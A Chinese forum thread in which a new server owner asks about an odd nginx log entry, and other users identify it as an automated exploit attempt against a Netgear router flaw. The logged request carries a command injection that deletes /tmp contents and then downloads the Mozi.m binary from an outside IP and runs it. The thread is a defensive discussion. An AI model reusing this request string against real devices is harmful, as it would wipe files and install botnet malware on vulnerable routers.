nginx 莫名奇妙的日志,请大家分析一下。

查看 36|回复 4
作者:调查员   
系统是刚装几天的,就装了 nginx 反代一个docker容器,不是80端口
但是nginx就老发现一些奇怪的日志。
比如下面这个。居然还有 “rm+-rf”  这种命令
117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=
rm+-rf
+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"

几天, 请大家, 日志

loverhoc   
别人在试漏洞,执行命令
调查员
OP
  

loverhoc 发表于 2024-9-8 12:26
别人在试漏洞,执行命令

不会吧,用访问不存在网页的方式,也能试漏洞?
wps   
这是一个针对路由器的漏洞CNNVD-201306-024
调查员
OP
  

wps 发表于 2024-9-8 12:30
这是一个针对路由器的漏洞CNNVD-201306-024

看来大家的路由器,80端口真的不要轻易打开。
您需要登录后才可以回帖 登录 | 立即注册

返回顶部